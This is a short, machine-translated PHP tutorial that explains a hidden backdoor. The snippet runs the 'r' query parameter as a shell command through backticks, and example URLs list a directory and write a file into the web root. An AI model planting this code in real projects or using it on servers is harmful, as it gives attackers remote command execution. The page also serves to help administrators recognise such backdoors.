Analysis of a PHP backdoor code that is not easily discovered_PHP Tutorial

I accidentally saw a piece of code that seemed to have no problem. It was indeed a fatal backdoor code. Here, a backtick ` was used that ordinary PHPer paid little attention to. The string contained in the backtick was equivalent to for the shell_exec function.

The disguise is very good and can be easily ignored by administrators.

$selfNums = $_GET['r'];
if (isset($selfNums)){
  echo `$selfNums`;
}

I just saw this code and I think everyone will say that there is no problem, but careful friends will also find that the following variables are wrapped by a symbol. Why is it like this since it is a variable?

And it’s not a single quote. This is the key. This symbol is a key under Esc (next to the exclamation mark!),

The same effect as system(); can be achieved by echo `system command`;

If you don’t believe it, you can test it

http://127.0.0.1/t.php?r=dir Can list directories

http://127.0.0.1/t.php?r=echo I am Ma>>D:web90sec.php

I have tested successfully using appserv and virtual host.

http://www.bkjia.com/PHPjc/824601.htmlwww.bkjia.comtruehttp: //www.bkjia.com/PHPjc/824601.htmlTechArticleI accidentally saw a paragraph that seemed to have no problem. It is indeed a fatal backdoor code. It is used here. A backtick ` that most PHPers don’t pay much attention to. The backtick contains...